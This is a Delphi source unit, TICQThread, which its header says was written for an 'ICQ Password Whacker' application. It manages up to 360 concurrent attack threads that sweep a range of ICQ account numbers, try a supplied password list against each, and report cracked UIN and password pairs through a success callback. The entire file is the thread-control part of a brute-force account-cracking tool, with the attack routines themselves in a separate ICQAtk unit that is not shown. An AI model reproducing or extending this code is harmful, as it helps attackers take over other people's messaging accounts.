unit ICQThread;
(***********************************************************)
(*   TICQThread, v. 02 (updated and fixed)
(*   Thread control component, uses ICQAtk.
(*   ---
(*
(*   Written by Coban(alex@ritlabs.com), special for using
(*   in ICQ Password Whacker app.
(**********)
interface
uses
  ICQAtk,
  SysUtils,
  Dialogs,
  Windows;

const
  MAX_THREADS = 360;

type
  TICQThread = class
  protected
    procedure OnIntStatus(StatStr: String; StatNo: Integer; UIN: LongWord; Pass: String; LPort: Integer; Thread: Byte);
    procedure OnIntSuccess(ICQ_UIN: LongWord; ICQ_PASS: String);
    procedure OnIntError(ErrorStr: String; ErrorNo: Integer);
  private
    FOnSuccess: TOnSuccessProc;                   // OnSuccess Proc
    FOnStatus: TOnStatusProc;                     // OnStatus Proc
    FTimeout: Integer;                            // Sock timeout
    FStart: LongWord;                             // Range start
    FEnd: LongWord;                                   // Range end
    FUseLogOff: Boolean;                              // Use Log Off
    FUseSmart: Boolean;                               // Use Smart Attack
    FAckTimeout: Word;                                // Ack timeout
    FPasswords: String;                               // Password list
    MaxThreads: Byte;                                 // Max threads
    AtkThreads: array[1..MAX_THREADS] of TICQAtk;     // Attack threads
    AtkFreeThreads: array[1..MAX_THREADS] of Boolean; // FreeThreads
    Allowed: Byte;                                    // Allowed range of threads
    FOnError: TOnErrorProc;                           // OnError Proc
    FRetries: Byte;                                   // Number of retries, default 1
    procedure Pinge;                                  // Initial whack
    procedure ReAssign(Thread: Byte);                 // Reassign thread
  public
    constructor Create(_Start: LongWord; _End: LongWord; _PassList: String; ThreadNo: Byte = 1; Timeout: Word = 5000; UseLogOff: Boolean = False; UseSmart: Boolean = False; AckTimeout: Integer = 0; Retries: Byte = 1);
    destructor Destroy; override;
    procedure StartAtk;
  published
    property OnError       : TOnErrorProc Read FOnError Write FOnError;
    property OnSuccess     : TOnSuccessProc Read FOnSuccess Write FOnSuccess;
    property OnStatus      : TOnStatusProc Read FOnStatus Write FOnStatus;
  end;

implementation
  constructor TICQThread.Create(_Start: LongWord; _End: LongWord; _PassList: String; ThreadNo: Byte = 1; Timeout: Word = 5000; UseLogOff: Boolean = False; UseSmart: Boolean = False; AckTimeout: Integer = 0; Retries: Byte = 1);
  begin
    FStart := _Start - 1;
    FEnd := _End;
    FPasswords := _PassList;
    FTimeout := Timeout;
    FUseLogOff := UseLogOff;
    FUseSmart := UseSmart;
    FAckTimeout := AckTimeout;
    FRetries := Retries;
    MaxThreads := ThreadNo;
    Pinge;
  end;

  destructor TICQThread.Destroy;
  var
    i: Integer;
  begin
    for i := 1 to Allowed do
      if not AtkFreeThreads[i] then
        AtkThreads[i].Destroy;
    inherited Destroy;
  end;

  procedure TICQThread.OnIntStatus(StatStr: String; StatNo: Integer; UIN: LongWord; Pass: String; LPort: Integer; Thread: Byte);
  begin
    if Assigned(OnStatus) then
      FOnStatus(StatStr, StatNo, UIN, Pass, LPort, Thread);
    if StatNo = $0002 then
      ReAssign(Thread);
  end;

  procedure TICQThread.OnIntSuccess(ICQ_UIN: LongWord; ICQ_PASS: String);
  begin
    if Assigned(OnSuccess) then
      FOnSuccess(ICQ_UIN, ICQ_PASS);
  end;

  procedure TICQThread.OnIntError(ErrorStr: String; ErrorNo: Integer);
  begin
    if Assigned(OnError) then
      FOnError(ErrorStr, ErrorNo);
  end;

  procedure TICQThread.Pinge;
  var
    i: Byte;
    FUStart: LongWord;
  begin
    Allowed := 0;
    FUStart := FStart;
    if FEnd - FStart < MaxThreads then
      MaxThreads := FEnd - FStart;
    for i := 1 to MaxThreads do
    begin
      FUStart := FUStart + 1;
      if FStart > FEnd then
        Continue;
      if i > FEnd then
        Continue;
      Allowed := Allowed + 1;
      AtkThreads[i] := TICQAtk.Create(FUStart, FUStart, FPasswords, FTimeout, i, FUseLogOff, FUseSmart, FAckTimeout, FRetries);
      AtkThreads[i].OnStatus := OnIntStatus;
      AtkThreads[i].OnSuccess := OnIntSuccess;
      AtkThreads[i].OnError := OnIntError;
      AtkFreeThreads[i] := False;
    end;
  end;

  procedure TICQThread.ReAssign(Thread: Byte);
  begin
    FStart := FStart + 1;
    if FEnd >= FStart then
      AtkThreads[Thread].Reset(FStart)
    else
      if Assigned(OnStatus) then
        FOnStatus('Done. Thread closed...', $FFFF, 0, '', 0, Thread);
  end;

  procedure TICQThread.StartAtk;
  var
    i: Byte;
  begin
    for i := 1 to Allowed do
      AtkThreads[i].StartAtk;
  end;
end.